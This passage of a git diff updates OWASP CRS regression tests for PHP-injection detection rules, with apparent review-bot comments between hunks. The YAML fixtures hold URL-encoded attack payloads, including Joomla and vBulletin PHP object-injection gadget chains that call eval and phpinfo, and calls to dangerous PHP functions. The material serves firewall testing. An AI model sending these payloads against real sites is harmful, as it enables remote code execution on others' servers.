payload: assert_OptionS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 35 desc: | PHP function call `filegroup` with multiple whitespaces. payload: filegroup (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filegroup%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filegroup%20%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 36 desc: | PHP function call in URI payload: unpack() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/unpack()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - 
test_title: 933160-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/unpack()" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 37 desc: | PHP function call in URI, using mixed case payload: unPACK($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unPACK%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unPACK%28%24x%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index 8c12ac72f..fe5ac6247 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml 
@@ -1,93 +1,92 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933161.yaml +rule_id: 933161 tests: - - test_title: 933161-1 + - test_id: 1 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20checkDate%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-2 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20checkDate%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933161] + - test_id: 2 desc: regexp; must run test in PL3! 
stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=chroot%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-3 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=chroot%09%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933161] + - test_id: 3 desc: symlink \t() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=symlink%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=symlink%09%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933161] + # See https://github.com/coreruleset/coreruleset/issues/3693 # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075 - # - test_title: 933161-4 + # - test_id: 4 # desc: dl/*foo*/() # stages: - # - stage: - # input: - # data: gethostbynamE( - # dest_addr: 127.0.0.1 - # headers: - # Host: localhost - # User-Agent: "OWASP CRS test agent" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # 
method: POST - # port: 80 - # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" - # version: "HTTP/1.1" - # output: - # log_contains: id "933161" - - test_title: 933161-5 + # - input: + # data: gethostbynamE( + # dest_addr: 127.0.0.1 + # headers: + # Host: localhost + # User-Agent: "OWASP CRS test agent" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # method: POST + # port: 80 + # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" + # version: "HTTP/1.1" + # output: + # log: + # expect_ids: [933161] + - test_id: 5 desc: ucfirst() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=xucfirst%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=xucfirst%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933161] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 9dd5a73be..0587a2cd0 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml 
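Review bot: The descriptions of test_id 1 and test_id 2 (`desc: regexp; must run test in PL3!`) do not name the payload being sent, unlike test_id 3 (`desc: symlink \t()`), so a failure report would not tell the reader which function name is under test. I would change them to `desc: checkDate() with leading space; must run test in PL3!` and `desc: chroot \t(); must run test in PL3!`, mirroring what the `uri` values `/post?%20checkDate%28%29` and `/post?foo=chroot%09%28%29` encode. Every test in the file, including the negative test_id 5, also sends the same body `data: gethostbynamE(` while the payload of interest sits in the query string; if that body is a deliberate baseline fixture rather than a leftover, a one-line comment above the first stage saying so would save the next maintainer from guessing.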
@@ -1,175 +1,173 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933170.yaml +rule_id: 933170 tests: - - test_title: 933170-1 + - test_id: 1 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 2 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 3 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize2" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-4 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize2" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 4 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-5 + - input: + 
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 5 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-6 + - input: + data: 
foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 6 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-7 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 7 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize6" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-8 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize6" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 8 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize7" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-9 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: POST + port: 80 + uri: "/post/serialize7" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 9 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize8" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-10 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize8" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 10 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize9" - version: "HTTP/1.1" - output: - log_contains: id "933170" + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize9" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] 
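Review bot: In test_id 4, 5 and 6 the request body `data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D` is the same serialized object that test_id 3 and 7–10 show is sufficient on its own to produce `expect_ids: [933170]`, so the longer payloads placed in those three tests' `uri` query strings are never actually required for the tests to pass. If the intent of 4–6 is to cover the query-string variants, the `data:` line should be dropped from those tests (or replaced with a neutral body such as `data: foo=bar`) so that a regression in matching the URI payload is detected rather than masked by the body. All ten tests also share `desc: PHP object injection`; with titles now reduced to `test_id: N`, a desc naming the vector (e.g. `desc: PHP object injection, serialized object in POST body`) is the only human-readable differentiator left.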
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 570c68e4b..380694bd4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml 
@@ -1,583 +1,600 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933180.yaml +rule_id: 933180 tests: - - test_title: 933180-1 + - test_id: 1 desc: PHP variable functions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=" - version: "HTTP/1.1" - output: - no_log_contains: id "933180" - - test_title: 933180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933180] + - test_id: 2 desc: $a(1) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24a%281%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24a%281%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 3 desc: $$b(2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24%24b%282%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-4 + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24%24b%282%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 4 desc: $_(3) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24_%283%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24_%283%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 5 desc: '@$__[o](4)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%40%24__%5Bo%5D%284%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%40%24__%5Bo%5D%284%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 6 desc: $__['o'](5) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%27o%27%5D%285%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%27o%27%5D%285%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 7 desc: $__[@o](6) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%40o%5D%286%29' - version: "HTTP/1.1" - output: - log_contains: id "933180" - - test_title: 933180-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "POST" + uri: / + data: 'foo=%24__%5B%40o%5D%286%29' + version: "HTTP/1.1" + output: + log: + expect_ids: [933180] + - test_id: 8 desc: $__[$_[1]](7) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: / - data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' - version: 